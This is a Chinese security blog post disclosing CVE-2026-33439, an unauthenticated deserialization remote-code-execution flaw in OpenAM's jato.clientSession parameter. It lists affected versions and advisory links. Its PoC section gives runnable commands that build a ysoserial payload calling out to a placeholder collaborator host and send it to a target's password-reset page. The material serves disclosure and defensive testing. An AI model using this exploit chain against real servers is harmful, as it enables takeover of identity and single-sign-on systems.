首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2026-33439|OpenAM反序列化远程代码执行(POC)

CVE-2026-33439|OpenAM反序列化远程代码执行(POC)

作者头像
信安百科
发布2026-04-20 13:09:11
发布2026-04-20 13:09:11
1670
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

OpenIdentityPlatform OpenAM是一款基于Java开发的开源访问管理解决方案,以模块化可插拔架构为核心,提供认证、单点登录(SSO)、授权、联合身份认证等全链路身份安全能力。它支持密码、一次性密码(OTP)等多种认证方式,兼容SAML、OAuth2、Kerberos等主流协议,可通过集成OpenIG或策略代理实现灵活的访问控制策略,实现跨域单点登录;

作为企业级身份管理工具,它能无缝对接LDAP、Active Directory等身份数据源,广泛应用于企业内部系统统一管控、B2B集成认证、云服务与移动应用安全接入等场景,遵循CDDL许可证,提供社区与商业双重支持选项,帮助组织构建安全高效的数字身份管理体系。

0x01 漏洞描述

漏洞源于组件在使用JATO框架处理jato.clientSession HTTP参数时,直接对用户输入的字节流进行了Java反序列化处理,且未应用此前针对jato.pageSession参数设置的白名单(WhitelistObjectInputStream)防护措施。

未经身份验证的远程攻击者通过向包含<jato:form>标签的JSP页面(如密码重置页面)发送构造的恶意序列化对象,即可在服务器上实现任意代码执行。

0x02 CVE编号

CVE-2026-33439

0x03 影响版本

OpenAM<=16.0.5

0x04 漏洞详情

POC:

代码语言:javascript
复制
java --add-opens java.base/java.util=ALL-UNNAMED \
     --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
     -jar ysoserial-all.jar OpenAM1 \
     "curl http://YOUR-COLLABORATOR-ID.oastify.com" > payload.bin

PAYLOAD=$(base64 < payload.bin | tr -d '\n' | tr '+/' '-_' | tr -d '=')
代码语言:javascript
复制
curl -k "https://TARGET/openam/ui/PWResetUserValidation?jato.clientSession=${PAYLOAD}"

0x05 参考链接

https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

https://github.com/OpenIdentityPlatform/OpenAM/releases

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持!!!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2026-04-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档